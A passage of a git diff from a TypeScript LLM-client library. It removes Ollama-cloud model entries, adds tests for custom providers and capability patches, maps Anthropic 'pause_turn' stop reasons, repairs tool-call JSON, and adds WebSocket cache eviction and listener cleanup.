-			name: "Kimi K2 1T",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"kimi-k2.5": {
-			id: "kimi-k2.5",
-			name: "Kimi K2.5",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"kimi-k2-thinking": {
-			id: "kimi-k2-thinking",
-			name: "Kimi K2 Thinking",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"minimax-m2.1": {
-			id: "minimax-m2.1",
-			name: "Minimax M2.1",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"minimax-m2.5": {
-			id: "minimax-m2.5",
-			name: "Minimax M2.5",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"minimax-m2": {
-			id: "minimax-m2",
-			name: "Minimax M2",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 204800,
-			maxTokens: 128000,
-		} satisfies Model<"openai-completions">,
-		"ministral-3:14b": {
-			id: "ministral-3:14b",
-			name: "Ministral 3 14B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 128000,
-		} satisfies Model<"openai-completions">,
-		"ministral-3:3b": {
-			id: "ministral-3:3b",
-			name: "Ministral 3 3B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 128000,
-		} satisfies Model<"openai-completions">,
-		"ministral-3:8b": {
-			id: "ministral-3:8b",
-			name: "Ministral 3 8B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 128000,
-		} satisfies Model<"openai-completions">,
-		"mistral-large-3:675b": {
-			id: "mistral-large-3:675b",
-			name: "Mistral Large 3 675B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 262144,
-		} satisfies Model<"openai-completions">,
-		"nemotron-3-nano:30b": {
-			id: "nemotron-3-nano:30b",
-			name: "Nemotron 3 Nano 30B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 1048576,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"nemotron-3-super": {
-			id: "nemotron-3-super",
-			name: "Nemotron 3 Super",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"qwen3.5:397b": {
-			id: "qwen3.5:397b",
-			name: "Qwen 3.5 397B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 81920,
-		} satisfies Model<"openai-completions">,
-		"qwen3-coder:480b": {
-			id: "qwen3-coder:480b",
-			name: "Qwen 3 Coder 480B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"qwen3-coder-next": {
-			id: "qwen3-coder-next",
-			name: "Qwen 3 Coder Next",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 65536,
-		} satisfies Model<"openai-completions">,
-		"qwen3-next:80b": {
-			id: "qwen3-next:80b",
-			name: "Qwen 3 Next 80B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 32768,
-		} satisfies Model<"openai-completions">,
-		"qwen3-vl:235b-instruct": {
-			id: "qwen3-vl:235b-instruct",
-			name: "Qwen 3 VL 235B Instruct",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 131072,
-		} satisfies Model<"openai-completions">,
-		"qwen3-vl:235b": {
-			id: "qwen3-vl:235b",
-			name: "Qwen 3 VL 235B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":true,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: true,
-			input: ["text", "image"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 262144,
-			maxTokens: 32768,
-		} satisfies Model<"openai-completions">,
-		"rnj-1:8b": {
-			id: "rnj-1:8b",
-			name: "RNJ 1 8B",
-			api: "openai-completions",
-			provider: "ollama-cloud",
-			baseUrl: "https://ollama.com/v1",
-			compat: {"supportsStore":false,"supportsDeveloperRole":false,"supportsReasoningEffort":false,"maxTokensField":"max_tokens","supportsStrictMode":false},
-			reasoning: false,
-			input: ["text"],
-			cost: {
-				input: 0,
-				output: 0,
-				cacheRead: 0,
-				cacheWrite: 0,
-			},
-			contextWindow: 32768,
-			maxTokens: 4096,
-		} satisfies Model<"openai-completions">,
 	},
 } as const;
diff --git a/packages/pi-ai/src/models.test.ts b/packages/pi-ai/src/models.test.ts
new file mode 100644
index 000000000..068004ad3
--- /dev/null
+++ b/packages/pi-ai/src/models.test.ts
@@ -0,0 +1,231 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { getProviders, getModels, getModel, supportsXhigh, applyCapabilityPatches } from "./models.js";
+import type { Api, Model } from "./types.js";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Custom provider preservation (regression: #2339)
+//
+// Custom providers (like alibaba-coding-plan) are manually maintained and
+// NOT sourced from models.dev. They must survive models.generated.ts
+// regeneration by living in models.custom.ts.
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("model registry — custom providers", () => {
+	it("alibaba-coding-plan is a registered provider", () => {
+		const providers = getProviders();
+		assert.ok(
+			providers.includes("alibaba-coding-plan"),
+			`Expected "alibaba-coding-plan" in providers, got: ${providers.join(", ")}`,
+		);
+	});
+
+	it("alibaba-coding-plan has all expected models", () => {
+		const models = getModels("alibaba-coding-plan");
+		const ids = models.map((m) => m.id).sort();
+		const expected = [
+			"MiniMax-M2.5",
+			"glm-4.7",
+			"glm-5",
+			"kimi-k2.5",
+			"qwen3-coder-next",
+			"qwen3-coder-plus",
+			"qwen3-max-2026-01-23",
+			"qwen3.5-plus",
+		];
+		assert.deepEqual(ids, expected);
+	});
+
+	it("alibaba-coding-plan models use the correct base URL", () => {
+		const models = getModels("alibaba-coding-plan");
+		for (const model of models) {
+			assert.equal(
+				model.baseUrl,
+				"https://coding-intl.dashscope.aliyuncs.com/v1",
+				`Model ${model.id} has wrong baseUrl: ${model.baseUrl}`,
+			);
+		}
+	});
+
+	it("alibaba-coding-plan models use openai-completions API", () => {
+		const models = getModels("alibaba-coding-plan");
+		for (const model of models) {
+			assert.equal(model.api, "openai-completions", `Model ${model.id} has wrong api: ${model.api}`);
+		}
+	});
+
+	it("alibaba-coding-plan models have provider set correctly", () => {
+		const models = getModels("alibaba-coding-plan");
+		for (const model of models) {
+			assert.equal(
+				model.provider,
+				"alibaba-coding-plan",
+				`Model ${model.id} has wrong provider: ${model.provider}`,
+			);
+		}
+	});
+
+	it("getModel retrieves alibaba-coding-plan models by provider+id", () => {
+		// Use type assertion to test runtime behavior — alibaba-coding-plan may come
+		// from custom models rather than the generated file, so the narrow
+		// GeneratedProvider type doesn't include it until models.custom.ts is merged.
+		const model = getModel("alibaba-coding-plan" as any, "qwen3.5-plus" as any);
+		assert.ok(model, "Expected getModel to return a model for alibaba-coding-plan/qwen3.5-plus");
+		assert.equal(model.id, "qwen3.5-plus");
+		assert.equal(model.provider, "alibaba-coding-plan");
+	});
+});
+
+describe("model registry — custom zai provider (GLM-5.1)", () => {
+	it("zai provider includes glm-5.1 from custom models", () => {
+		const models = getModels("zai" as any);
+		const ids = models.map((m) => m.id);
+		assert.ok(ids.includes("glm-5.1"), `Expected "glm-5.1" in zai models, got: ${ids.join(", ")}`);
+	});
+
+	it("glm-5.1 has correct provider and base URL", () => {
+		const model = getModel("zai" as any, "glm-5.1" as any);
+		assert.ok(model, "Expected getModel to return a model for zai/glm-5.1");
+		assert.equal(model.id, "glm-5.1");
+		assert.equal(model.provider, "zai");
+		assert.equal(model.baseUrl, "https://api.z.ai/api/coding/paas/v4");
+		assert.equal(model.api, "openai-completions");
+	});
+
+	it("glm-5.1 has reasoning enabled and correct context window", () => {
+		const model = getModel("zai" as any, "glm-5.1" as any);
+		assert.ok(model);
+		assert.equal(model.reasoning, true);
+		assert.equal(model.contextWindow, 204800);
+		assert.equal(model.maxTokens, 131072);
+	});
+
+	it("custom glm-5.1 does not overwrite generated zai models", () => {
+		const models = getModels("zai" as any);
+		const ids = models.map((m) => m.id);
+		// Generated models must still exist alongside custom glm-5.1
+		assert.ok(ids.includes("glm-5"), "Generated glm-5 should still exist");
+		assert.ok(ids.includes("glm-5-turbo"), "Generated glm-5-turbo should still exist");
+	});
+});
+
+describe("model registry — custom models do not collide with generated models", () => {
+	it("generated providers still exist alongside custom providers", () => {
+		const providers = getProviders();
+		// Spot-check a few generated providers
+		assert.ok(providers.includes("openai"), "openai should be in providers");
+		assert.ok(providers.includes("anthropic"), "anthropic should be in providers");
+	});
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Capability patches (regression: #2546)
+//
+// CAPABILITY_PATCHES must apply capabilities to models in the static
+// registry AND to models constructed outside of it (custom, extension,
+// discovered). supportsXhigh() reads model.capabilities — not model IDs.
+// ═══════════════════════════════════════════════════════════════════════════
+
+/** Helper: build a minimal synthetic model for testing */
+function syntheticModel(overrides: Partial<Model<Api>>): Model<Api> {
+	return {
+		id: "test-model",
+		name: "Test Model",
+		api: "openai-completions" as Api,
+		provider: "test-provider",
+		baseUrl: "https://example.com",
+		reasoning: false,
+		input: ["text"],
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+		contextWindow: 128000,
+		maxTokens: 16384,
+		...overrides,
+	} as Model<Api>;
+}
+
+describe("supportsXhigh — registry models", () => {
+	it("returns true for GPT-5.4 from the registry", () => {
+		const model = getModel("openai", "gpt-5.4" as any);
+		if (!model) return; // skip if model not in generated catalog
+		assert.equal(supportsXhigh(model), true);
+	});
+
+	it("returns false for a non-reasoning model", () => {
+		const models = getModels("openai");
+		const nonXhigh = models.find((m) => !m.id.includes("gpt-5."));
+		if (!nonXhigh) return;
+		assert.equal(supportsXhigh(nonXhigh), false);
+	});
+});
+
+describe("supportsXhigh — synthetic models (regression: custom/extension models)", () => {
+	it("returns false for a model without capabilities", () => {
+		const model = syntheticModel({ id: "my-custom-model" });
+		assert.equal(supportsXhigh(model), false);
+	});
+
+	it("returns true when capabilities.supportsXhigh is explicitly set", () => {
+		const model = syntheticModel({
+			id: "my-custom-model",
+			capabilities: { supportsXhigh: true },
+		});
+		assert.equal(supportsXhigh(model), true);
+	});
+});
+
+describe("applyCapabilityPatches", () => {
+	it("patches a GPT-5.4 model that has no capabilities", () => {
+		const model = syntheticModel({ id: "gpt-5.4-custom" });
+		assert.equal(model.capabilities, undefined);
+
+		const [patched] = applyCapabilityPatches([model]);
+		assert.equal(patched.capabilities?.supportsXhigh, true);
+		assert.equal(patched.capabilities?.supportsServiceTier, true);
+	});
+
+	it("patches a GPT-5.2 model", () => {
+		const model = syntheticModel({ id: "gpt-5.2" });
+		const [patched] = applyCapabilityPatches([model]);
+		assert.equal(patched.capabilities?.supportsXhigh, true);
+	});
+
+	it("patches an Anthropic Opus 4.6 model", () => {
+		const model = syntheticModel({
+			id: "claude-opus-4-6-20260301",
+			api: "anthropic-messages" as Api,
+		});
+		const [patched] = applyCapabilityPatches([model]);
+		assert.equal(patched.capabilities?.supportsXhigh, true);
+		// Opus should not get supportsServiceTier
+		assert.equal(patched.capabilities?.supportsServiceTier, undefined);
+	});
+
+	it("preserves explicit capabilities over patches", () => {
+		const model = syntheticModel({
+			id: "gpt-5.4-custom",
+			capabilities: { supportsXhigh: false, charsPerToken: 3 },
+		});
+		const [patched] = applyCapabilityPatches([model]);
+		// Explicit supportsXhigh: false wins over patch's true
+		assert.equal(patched.capabilities?.supportsXhigh, false);
+		// Patch fills in supportsServiceTier since it wasn't explicitly set
+		assert.equal(patched.capabilities?.supportsServiceTier, true);
+		// Explicit charsPerToken is preserved
+		assert.equal(patched.capabilities?.charsPerToken, 3);
+	});
+
+	it("does not modify models that match no patches", () => {
+		const model = syntheticModel({ id: "gemini-2.5-pro" });
+		const [patched] = applyCapabilityPatches([model]);
+		assert.equal(patched.capabilities, undefined);
+		// Should return the same reference when unpatched
+		assert.equal(patched, model);
+	});
+
+	it("is idempotent — re-applying patches produces the same result", () => {
+		const model = syntheticModel({ id: "gpt-5.3" });
+		const first = applyCapabilityPatches([model]);
+		const second = applyCapabilityPatches(first);
+		assert.deepEqual(first[0].capabilities, second[0].capabilities);
+	});
+});
diff --git a/packages/pi-ai/src/models.ts b/packages/pi-ai/src/models.ts
index 3c06c0cc6..ac0a729b7 100644
--- a/packages/pi-ai/src/models.ts
+++ b/packages/pi-ai/src/models.ts
@@ -1,9 +1,10 @@
 import { MODELS } from "./models.generated.js";
-import type { Api, KnownProvider, Model, Usage } from "./types.js";
+import { CUSTOM_MODELS } from "./models.custom.js";
+import type { Api, KnownProvider, Model, ModelCapabilities, Usage } from "./types.js";
 
 const modelRegistry: Map<string, Map<string, Model<Api>>> = new Map();
 
-// Initialize registry from MODELS on module load
+// Initialize registry from auto-generated MODELS (models.dev catalog)
 for (const [provider, models] of Object.entries(MODELS)) {
 	const providerModels = new Map<string, Model<Api>>();
 	for (const [id, model] of Object.entries(models)) {
@@ -12,12 +13,95 @@ for (const [provider, models] of Object.entries(MODELS)) {
 	modelRegistry.set(provider, providerModels);
 }
 
+// Merge manually-maintained custom providers that are NOT in models.dev.
+// Custom models are additive — they never overwrite generated entries.
+// See: https://github.com/gsd-build/gsd-2/issues/2339
+for (const [provider, models] of Object.entries(CUSTOM_MODELS)) {
+	if (!modelRegistry.has(provider)) {
+		modelRegistry.set(provider, new Map<string, Model<Api>>());
+	}
+	const providerModels = modelRegistry.get(provider)!;
+	for (const [id, model] of Object.entries(models)) {
+		if (!providerModels.has(id)) {
+			providerModels.set(id, model as Model<Api>);
+		}
+	}
+}
+
+// ─── Capability Patches ───────────────────────────────────────────────────────
+//
+// Declare capabilities for models that pre-date the `capabilities` field or
+// that live in the auto-generated catalog (models.generated.ts) which we
+// cannot edit directly. Pattern-matching on model IDs is acceptable HERE
+// because this is the single source of truth — call sites must never repeat it.
+//
+// Add new entries as additional capabilities emerge. Existing models that
+// define `capabilities` in their model definition take precedence (the patch
+// only fills in fields that are not already set).
+
+type CapabilityPatch = { match: (m: Model<Api>) => boolean; caps: ModelCapabilities };
+
+const CAPABILITY_PATCHES: CapabilityPatch[] = [
+	// GPT-5.x supports xhigh thinking and OpenAI service tiers
+	{
+		match: (m) => m.id.includes("gpt-5.2") || m.id.includes("gpt-5.3") || m.id.includes("gpt-5.4"),
+		caps: { supportsXhigh: true, supportsServiceTier: true },
+	},
+	// Anthropic Opus 4.6 supports xhigh thinking
+	{
+		match: (m) => m.api === "anthropic-messages" && (m.id.includes("opus-4-6") || m.id.includes("opus-4.6")),
+		caps: { supportsXhigh: true },
+	},
+];
+
+/**
+ * Apply capability patches to a list of models.
+ *
+ * Models constructed outside the static pi-ai registry (custom models from
+ * models.json, extension-registered models, discovered models) do not pass
+ * through the module-init patch loop. Call this function after assembling
+ * any model list to ensure capabilities are set correctly.
+ *
+ * Explicit `capabilities` already set on a model take precedence over patches.
+ */
+export function applyCapabilityPatches(models: Model<Api>[]): Model<Api>[] {
+	return models.map((model) => {
+		for (const patch of CAPABILITY_PATCHES) {
+			if (patch.match(model)) {
+				return {
+					...model,
+					capabilities: { ...patch.caps, ...model.capabilities },
+				};
+			}
+		}
+		return model;
+	});
+}
+
+// Apply patches to the static registry at module load
+for (const [, providerModels] of modelRegistry) {
+	for (const [id, model] of providerModels) {
+		for (const patch of CAPABILITY_PATCHES) {
+			if (patch.match(model)) {
+				providerModels.set(id, {
+					...model,
+					capabilities: { ...patch.caps, ...model.capabilities },
+				});
+				break;
+			}
+		}
+	}
+}
+
+/** Providers that have entries in the generated MODELS constant */
+type GeneratedProvider = keyof typeof MODELS & KnownProvider;
+
 type ModelApi<
-	TProvider extends KnownProvider,
+	TProvider extends GeneratedProvider,
 	TModelId extends keyof (typeof MODELS)[TProvider],
 > = (typeof MODELS)[TProvider][TModelId] extends { api: infer TApi } ? (TApi extends Api ? TApi : never) : never;
 
-export function getModel<TProvider extends KnownProvider, TModelId extends keyof (typeof MODELS)[TProvider]>(
+export function getModel<TProvider extends GeneratedProvider, TModelId extends keyof (typeof MODELS)[TProvider]>(
 	provider: TProvider,
 	modelId: TModelId,
 ): Model<ModelApi<TProvider, TModelId>> {
@@ -31,9 +115,9 @@ export function getProviders(): KnownProvider[] {
 
 export function getModels<TProvider extends KnownProvider>(
 	provider: TProvider,
-): Model<ModelApi<TProvider, keyof (typeof MODELS)[TProvider]>>[] {
+): Model<Api>[] {
 	const models = modelRegistry.get(provider);
-	return models ? (Array.from(models.values()) as Model<ModelApi<TProvider, keyof (typeof MODELS)[TProvider]>>[]) : [];
+	return models ? (Array.from(models.values()) as Model<Api>[]) : [];
 }
 
 export function calculateCost<TApi extends Api>(model: Model<TApi>, usage: Usage): Usage["cost"] {
@@ -48,20 +132,12 @@ export function calculateCost<TApi extends Api>(model: Model<TApi>, usage: Usage
 /**
  * Check if a model supports xhigh thinking level.
  *
- * Supported today:
- * - GPT-5.2 / GPT-5.3 / GPT-5.4 model families
- * - Anthropic Messages API Opus 4.6 models (xhigh maps to adaptive effort "max")
+ * Reads from `model.capabilities.supportsXhigh` — set via CAPABILITY_PATCHES
+ * for generated models or declared directly in custom model definitions.
+ * Do not add model-ID or provider-name checks here; update CAPABILITY_PATCHES instead.
  */
 export function supportsXhigh<TApi extends Api>(model: Model<TApi>): boolean {
-	if (model.id.includes("gpt-5.2") || model.id.includes("gpt-5.3") || model.id.includes("gpt-5.4")) {
-		return true;
-	}
-
-	if (model.api === "anthropic-messages") {
-		return model.id.includes("opus-4-6") || model.id.includes("opus-4.6");
-	}
-
-	return false;
+	return model.capabilities?.supportsXhigh ?? false;
 }
 
 /**
diff --git a/packages/pi-ai/src/providers/anthropic-shared.test.ts b/packages/pi-ai/src/providers/anthropic-shared.test.ts
new file mode 100644
index 000000000..9b6718570
--- /dev/null
+++ b/packages/pi-ai/src/providers/anthropic-shared.test.ts
@@ -0,0 +1,29 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { mapStopReason } from "./anthropic-shared.js";
+
+describe("mapStopReason", () => {
+	it("maps end_turn to stop", () => {
+		assert.equal(mapStopReason("end_turn"), "stop");
+	});
+
+	it("maps max_tokens to length", () => {
+		assert.equal(mapStopReason("max_tokens"), "length");
+	});
+
+	it("maps tool_use to toolUse", () => {
+		assert.equal(mapStopReason("tool_use"), "toolUse");
+	});
+
+	it("maps pause_turn to pauseTurn (not stop)", () => {
+		// pause_turn means the server paused a long-running turn (e.g. native
+		// web search hit its iteration limit). Mapping it to "stop" causes the
+		// agent loop to exit, leaving an incomplete server_tool_use block in
+		// history which triggers a 400 on the next request.
+		assert.equal(mapStopReason("pause_turn"), "pauseTurn");
+	});
+
+	it("throws on unknown stop reason", () => {
+		assert.throws(() => mapStopReason("bogus"), /Unhandled stop reason/);
+	});
+});
diff --git a/packages/pi-ai/src/providers/anthropic-shared.ts b/packages/pi-ai/src/providers/anthropic-shared.ts
index 4425df7dd..098f50721 100644
--- a/packages/pi-ai/src/providers/anthropic-shared.ts
+++ b/packages/pi-ai/src/providers/anthropic-shared.ts
@@ -31,6 +31,7 @@ import type {
 export type AnthropicApi = "anthropic-messages" | "anthropic-vertex";
 import type { AssistantMessageEventStream } from "../utils/event-stream.js";
 import { parseStreamingJson } from "../utils/json-parse.js";
+import { hasXmlParameterTags, repairToolJson } from "../utils/repair-tool-json.js";
 import { sanitizeSurrogates } from "../utils/sanitize-unicode.js";
 import { transformMessages } from "./transform-messages.js";
 
@@ -502,7 +503,7 @@ export function mapStopReason(reason: string): StopReason {
 		case "refusal":
 			return "error";
 		case "pause_turn":
-			return "stop";
+			return "pauseTurn";
 		case "stop_sequence":
 			return "stop";
 		case "sensitive":
@@ -696,7 +697,22 @@ export function processAnthropicStream(
 								partial: output,
 							});
 						} else if (block.type === "toolCall") {
-							block.arguments = parseStreamingJson(block.partialJson);
+							// Try strict parse first; if it fails, attempt YAML bullet
+							// repair (#2660) before falling back to the lenient streaming
+							// parser which silently swallows errors.
+							const raw = block.partialJson ?? "";
+							const rawForParse = hasXmlParameterTags(raw) ? repairToolJson(raw) : raw;
+							let parsed: Record<string, any> | undefined;
+							try {
+								parsed = JSON.parse(rawForParse);
+							} catch {
+								try {
+									parsed = JSON.parse(repairToolJson(rawForParse));
+								} catch {
+									// Fall through to streaming parser
+								}
+							}
+							block.arguments = parsed ?? parseStreamingJson(block.partialJson);
 							delete (block as any).partialJson;
 							stream.push({
 								type: "toolcall_end",
diff --git a/packages/pi-ai/src/providers/openai-codex-responses.ts b/packages/pi-ai/src/providers/openai-codex-responses.ts
index 3a93e9fa0..294290188 100644
--- a/packages/pi-ai/src/providers/openai-codex-responses.ts
+++ b/packages/pi-ai/src/providers/openai-codex-responses.ts
@@ -451,6 +451,7 @@ async function* parseSSE(response: Response): AsyncGenerator<Record<string, unkn
 
 const OPENAI_BETA_RESPONSES_WEBSOCKETS = "responses_websockets=2026-02-06";
 const SESSION_WEBSOCKET_CACHE_TTL_MS = 5 * 60 * 1000;
+const MAX_WEBSOCKET_CACHE_SIZE = 10;
 
 type WebSocketEventType = "open" | "message" | "error" | "close";
 type WebSocketListener = (event: unknown) => void;
@@ -635,6 +636,20 @@ async function acquireWebSocket(
 
 	const socket = await connectWebSocket(url, headers, signal);
 	const entry: CachedWebSocketConnection = { socket, busy: true };
+
+	// Evict the oldest entry if the cache is at capacity (LRU eviction).
+	if (websocketSessionCache.size >= MAX_WEBSOCKET_CACHE_SIZE) {
+		const oldestKey = websocketSessionCache.keys().next().value;
+		if (oldestKey) {
+			const oldEntry = websocketSessionCache.get(oldestKey);
+			websocketSessionCache.delete(oldestKey);
+			if (oldEntry) {
+				if (oldEntry.idleTimer) clearTimeout(oldEntry.idleTimer);
+				closeWebSocketSilently(oldEntry.socket);
+			}
+		}
+	}
+
 	websocketSessionCache.set(sessionId, entry);
 	return {
 		socket,
@@ -705,12 +720,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy
 		resolve();
 	};
 
+	const cleanup = () => {
+		socket.removeEventListener("message", onMessage);
+		socket.removeEventListener("error", onError);
+		socket.removeEventListener("close", onClose);
+		signal?.removeEventListener("abort", onAbort);
+	};
+
 	const onMessage: WebSocketListener = (event) => {
 		void (async () => {
-			if (!event || typeof event !== "object" || !("data" in event)) return;
-			const text = await decodeWebSocketData((event as { data?: unknown }).data);
-			if (!text) return;
 			try {
+				if (!event || typeof event !== "object" || !("data" in event)) return;
+				const text = await decodeWebSocketData((event as { data?: unknown }).data);
+				if (!text) return;
 				const parsed = JSON.parse(text) as Record<string, unknown>;
 				const type = typeof parsed.type === "string" ? parsed.type : "";
 				if (type === "response.completed" || type === "response.done") {
@@ -719,7 +741,19 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy
 				}
 				queue.push(parsed);
 				wake();
-			} catch {}
+			} catch (err) {
+				// Ensure listeners are cleaned up if the async handler errors.
+				// Without this, the fire-and-forget promise would swallow the
+				// error while leaving listeners attached to the socket.
+				if (err instanceof SyntaxError) {
+					// JSON parse failure — skip the malformed message.
+					return;
+				}
+				failed = err instanceof Error ? err : new Error(String(err));
+				done = true;
+				cleanup();
+				wake();
+			}
 		})();
 	};
 
@@ -775,10 +809,7 @@ async function* parseWebSocket(socket: WebSocketLike, signal?: AbortSignal): Asy
 			throw new Error("WebSocket stream closed before response.completed");
 		}
 	} finally {
